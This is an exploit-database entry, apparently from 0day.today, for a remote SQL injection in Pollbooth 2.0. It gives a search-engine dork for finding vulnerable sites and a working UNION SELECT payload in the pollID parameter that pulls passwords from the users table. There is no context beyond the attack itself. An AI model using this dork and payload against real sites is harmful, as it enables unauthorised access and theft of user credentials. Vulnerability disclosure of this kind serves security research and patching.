id: 2873
date: 04/12/2008
title: Pollbooth <= 2.0 (pollID) Remote SQL Injection Vulnerability
author: S@BUN
cves: 

============================================================
Pollbooth <= 2.0 (pollID) Remote SQL Injection Vulnerability
============================================================



############################################
#
# Pollbooth v2.0 SQL Injection Vulnerability
#
#############################################
#
# DORK 1 : allinurl: "pollBooth.php?op=results"pollID
#
#############################################
EXPLOiT :

pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users

*********************************************




#  0day.today [2023-03-26]  #